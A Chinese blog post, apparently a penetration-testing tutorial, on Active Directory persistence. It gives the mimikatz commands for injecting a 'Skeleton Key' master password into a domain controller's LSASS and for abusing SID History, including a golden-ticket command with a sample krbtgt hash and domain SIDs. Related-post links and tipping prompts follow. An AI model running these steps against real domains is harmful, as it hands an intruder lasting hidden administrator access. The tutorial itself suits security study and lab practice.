域权限维持(万能密码与SID History滥用)

已于 2023-03-26 00:43:43 修改
阅读量278 收藏
点赞数
分类专栏: 域安全 文章标签: 信息安全 网络 网络安全 系统安全 安全
于 2023-03-24 16:12:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18811919/article/details/129742431
版权

文章目录

Skeleton Key(万能密码)介绍
在获得了域管理员或企业管理员的情况下可以在目标域控的Lsass内存中
注入特定的密码,然后使用该密码来以任何用户身份进行登录,包括域管理员
或企业管理员,用户还可以使用之前的正常密码进行登录,这种攻击方式被称为
Skeleton Key(万能密码),设置Skeleton Key需要域管权限或者企业管理员权限,
因此被用作权限维持。
使用mimikatz进行万能密码利用
需要在域控上使用mimikatz进行万能密码利用命令:
privilege::debug
misc::skeleton
注入成功之后域控的Lsass进程中会给所有账号添加万能密码mimikatz,
使用可以以RDP或ipc$等方式连接。

在这里插入图片描述

在域控成功之后登录任意域成员机使用mimikatz作为密码即可登陆成功。
SID History滥用简介
SIDHistory是一个为支持域迁移方案而设置的属性,当一个对象从一个域迁移到另一个域时,
会在新域创建一个新的SID作为该对象的objectSid,在之前域中的SID会添加到该对象的
sIDHistory属性中,此时该对象将保留在原来域的SID对应的访问权限。

在这里插入图片描述

SID History属性滥用(域控利用)
mimikatz命令:
	privilege::debug
	修复NTDS服务,否则无法将高权限的SID注入低权限用户的SID History属性
	sid::patch
	将域管理员administrator的SID添加到用户testSid2的slDHistory属性中
	sid::add /sam::testSid2 /new:administrator

在这里插入图片描述
在这里插入图片描述

成功设置后可以进行PTT或RDP登录等。
SID History属性滥用(krbtgt利用)
可以看成是黄金票据的一种拿到krbtgt之后将高权限用户的SID History添加到低权限的
用户中注入到内存进行Dcsync或进行远程登陆等,需要注意的是该操作并不会在域控的
ldap属性中添加上只会在攻击机的票据PAC中添加到高权限SID History。
利用步骤:
1.拿到krbtgt hash
	bdff817d8997011cb4405a615635143f
2.拿到高权限sid
	S-1-5-21-3042504039-1145428418-1324677547-512(Doamin Admins)
3.使用mimikatz进行攻击
sids:伪造SID
sid:域SID
testSid3普通域账号
mimikatz命令:
	kerberos::golden /user:testSid3 /sids:S-1-5-21-3042504039-1145428418-1324677547-512 /sid:S-1-5-21-3042504039-1145428418-1324677547 /domain:test.com /krbtgt:bdff817d8997011cb4405a615635143f /ptt

在这里插入图片描述
在这里插入图片描述

总结
本篇文章讲述了万能密码域SID History滥用这两种技术是较为
常见域内权限维持手段,这里注意介绍了mimikatz的利用方式。
虚构之人
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
内网渗透(六十九)之权限维持SID History 滥用
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-12 779
SID是用于标识主体的可变长度的唯一值,每个账户都有一个系统颁发的唯一SID,其存储在数据库(中的话就存储在活动目录数据库中)。用户每次登录时,系统都会从数据库中检索该用户的SID,并将其放在该用户的访问令牌中。系统使用访问令牌中的SID来识别与Windows安全所有后续交互中的用户。当SID被用作用户或组的唯一标识符时,他再也不能用于标识另一个用户或组。在活动目录数据库中对象的objectSid属性值就是SID
权限持久化之Skeleton Key(万能密码)
谢公子的博客
02-27 2923
使用Skeleton Key(万能密码),可以对权限进行持久化操作。 mimikatz注入Skeleton Key Skeleton Key攻击的防御措施 2014年,微软在Windows操作系统中增加了LSA保护策略,以防止lsass.exe进程被恶意注入,从而防止mimikatz在非允许的情况下提升到Debug权限。通用的Skeleton Key的防御措施列举如下: 管理员用户设...
权限维持
weixin_43047908的博客
06-04 718
目录Windows 操作系统常见持久性后门Windows系统隐藏账户 当我们在渗透过程中通过艰辛的努力终于获取了目标主机权限后,我们接下来要做的往往是在目标机器上创建一个后门来维持住我们所获得的权限,否则一旦目标密码被改变或者漏洞被修补,那么就会导致我们对服务器权限的丢失。有了后门,我们就可以进出内网如若无人之境,所以权限维持的重要性可见一斑。 Windows 操作系统常见持久性后门 几种常见的 Windows 系统后门,包括Windows系统隐藏用户、Shift粘粘键后门、注册表后门、Windows 计划
用户更改密码提示拒绝访问_Kerberos KDC权限提升漏洞总结
weixin_39559333的博客
12-03 966
01漏洞起源Windows Kerberos 对 kerberos tickets 中的 PAC(Privilege Attribute Certificate)的验证流程中存在安全漏洞,低权限的经过认证的远程攻击者利用该漏洞可以伪造一个PAC并通过 Kerberos KDC(Key Distribution Center)的验证,攻击成功使得攻击者可以提升权限,获取管理权限。02漏洞描述(1)...
SID History后门及检测思路分析
最新发布
#7的博客
03-22 918
可以看成是黄金票据的一种拿到krbtgt之后将高权限用户的SID History添加到低权限的用户中注入到内存进行Dcsync或进行远程登录等,需要注意的是该操作并不会在控的LDAP属性中添加,只会在攻击机的票据PAC中添加到高权限SID History。privilege::debug sid::patch sid::add /sam:whoami/new:Administrator (将Administrator的SID添加到whoami的SID History属性中)
权限维持方法浅析.pdf
08-08
SID History SID History -Golden Ticket Now More GOLDEN! Directory Service Restore Mode (DSRM) DSRM -Pass The Hash&DCSync Malicious Security Support Provider (SSP) Hook PasswordChangeNotify Skeleton ...
权限维持方法技术解析.pptx
10-19
在IT领,特别是网络安全和系统管理中,"权限维持方法技术解析"是一个重要的主题,涉及到如何保护和管理企业网络中的Active Directory环境。Active Directory(AD)是Microsoft Windows网络操作系统的核心组件,...
权限维持方法技术解析.pdf
10-19
与Golden Ticket不同,Silver Ticket不需要与控制器交互,因此更难以检测。例如,攻击者可以模拟自己为管理员组的成员,即使他们实际并非如此。 SID历史是Windows中的一种特性,允许用户在不同间迁移时保持...
OracleSID及密码问题解决.pdf
03-21
当你遇到Oracle SID及密码问题时,这通常涉及到数据库的配置、安装或安全设置。本文将深入探讨Oracle SID的概念、作用以及如何解决与SID相关的常见问题。 首先,SID在Oracle中的定义与Windows操作系统中的SID不同。...
渗透完全技巧.pdf
10-03
5. **权限维持**:一旦获取了权限,攻击者会部署后门,如利用信任关系、SID历史、AdminSDHolder和SDProp、Dcsync后门等。他们还会使用各种技巧,如组策略Hook、PasswordChangeNotify、Kerberoasting后门等,...
Skeleton Key万能密码)与 Hook PasswordChangeNotify
qq_41320638的博客
07-09 756
1、Skeleton Key 使用Skeleton Key万能密码),可以对权限进行持久化操作 Skeleton Key特点: Skeleton Key被安装在64位控服务器上 支持Windows Server2003—Windows Server2012 R2 能够让所有用户使用同一个万能密码进行登录 现有的所有用户使用原密码仍能继续登录 重启后失效 使用mimikatz注入Skeleton Key 远程控制器主机名:DC IP:192.168.111.3 用户名:ad.
权限维持之创建Skeleton Key后门
good good study
03-02 310
微软在2014年3月添加了LSA保护策略,用来防止对lsass.exe进程的内存读取和代码注入,该策略默认不开启。所以当开启了LSA保护策略时,使用mimikatz注入万能密码或抓取账号密码时会报“ERROR kuhl_m_misc_skeleton;通过给控制器账号安装万能密码,同时原有密码仍然有效。该技术通过注入lsass.exe进程实现,创建的万能密码仅保留在内存中,当控重启万能密码则失效。在控中执行,将万能密码注入控制器的 lsass.exe 进程,默认密码为“mimikatz”
权限维持Skeleton Key万能密码
01-29 561
01、简介 Skeleton Key(万能密码),是一种可以对权限进行持久化的操作,通过将Skeleton Key注入到lsass进程,无需重启控即可生效,而且能够在不影响当前用户正常登录的情况下,让所有用户使用同一个万能密码进行登录,它只存在于内存中,如果控制器重启,注入的 Skeleton Key 将会失效。 02、利用过程 (1)尝试以当前用户身份,查看当前网络资源的连接为空...
渗透-跨攻击
就是法老
08-19 1905
很多大型企业都拥有自己的内网,一般通过林进行共享资源。根握不同职能区分的部门,从逻辑上以主和子进行划分,方便统一管理。在物理层,通常使用防火墙将各个子公司及各个部门划分为不同的区。攻击者如果得到了某个子公司或者某个部门的控制器权限,但没有得到整个公司的内网全部权限,往往会想办法获取其他部门或者权限。 》》》跨攻击方法《《《 WEB漏洞:跨获取权限 PTH/PTT:DC本地管理员密码可能相同 信任关系:....... 》》》跨攻击--信任关系《《《 信任的作用:解决多.
渗透|权限维持Skeleton Key
weixin_42282189的博客
09-06 568
作者:作者: r0n1n 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 Skeleton Key万能密码)方法可以对内管理员权限进行持久化操作,使用mimikatz完成注入Skeleon Key的操作,将 Skeleton Key注入控制器的lsass.exe进程。 0x01 测试环境 1、名:god.com 2、控制器: 主机名:WIN-2008dc IP地址:10.10.10.30 用户名:administrator 密码:123.com 3、.
查看用户密码_Skeleton Key万能密码)对权限维持
weixin_39756445的博客
12-13 3380
渗透攻击红队一个专注于红队攻击的公众号大家好,这里是渗透攻击红队的第 39 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更Skeleton Key使用 Skeleton Key(万能密码),可以对权限进行持久化操作。使用 mimikatz 完成注入 Skeleon Key 的操作,将 Skeleton Key 注入控制器的 lsass.exe ...
渗透测试之子到父的横向移动(Sid History)
HBohan的博客
07-06 907
前言 本文接上篇文章探究子如何横向移动到父的Enterprise Admin组,并给出防御方法。 Enterprise Admins组 在父子中,最重要的莫过于Enterprise Admins组了,并且该组只存在于林根中,其成员有权管理林内的所有,这是因为在添加子后,Enterprise Admins组会自动添加到林中每个中的Administrators组成员中。但是该组在其他树中是不存在的,所以在子中是看不到有Enterprise Admins组。本文也是基于Enterprise A.
如何利用 SID History 创建权限后门?
weixin_34245749的博客
09-14 622
本文讲的是如何利用 SID History 创建权限后门?,本文的内容描述了一种方法,通过该方法,攻击者可以在拥有管理级别的权限的5分钟后,就可以持续的对Active Directory进行管理访问。 SID历史记录是支持迁移方案的属性。每个用户帐户都有一个关联的安全标识符(SID),用于跟踪安全主体和连接到资源时的帐户及访问权限SID历史记...
关于SidHistory
weixin_30952535的博客
08-12 221
先说明一下什么是SID历史,SID不可能重复,二个迁移为了保持原有安全性微软在对象的属性中添加了SidHistory这一属性,其实SidHistory也就是原SID。如果在做二个森林之间的帐号迁移(使用ADMT2.0)且做了双向信任并加了/EnableSidHistory参数,WIN2000SP4/WIN2003默认会做FilterSIDs的操作,此时迁移帐号时会过滤掉源SID,即在...
SID模型产品解析与翻译汇总
"SID产品翻译汇总,涵盖了产品的基本介绍、产品综述以及业务实体间的相互关系,强调了产品规格、产品实例和业务实体在SID模型中的重要性,同时指出产品与服务和资源的紧密联系。" SID产品是业务流程建模...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

虚构之人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值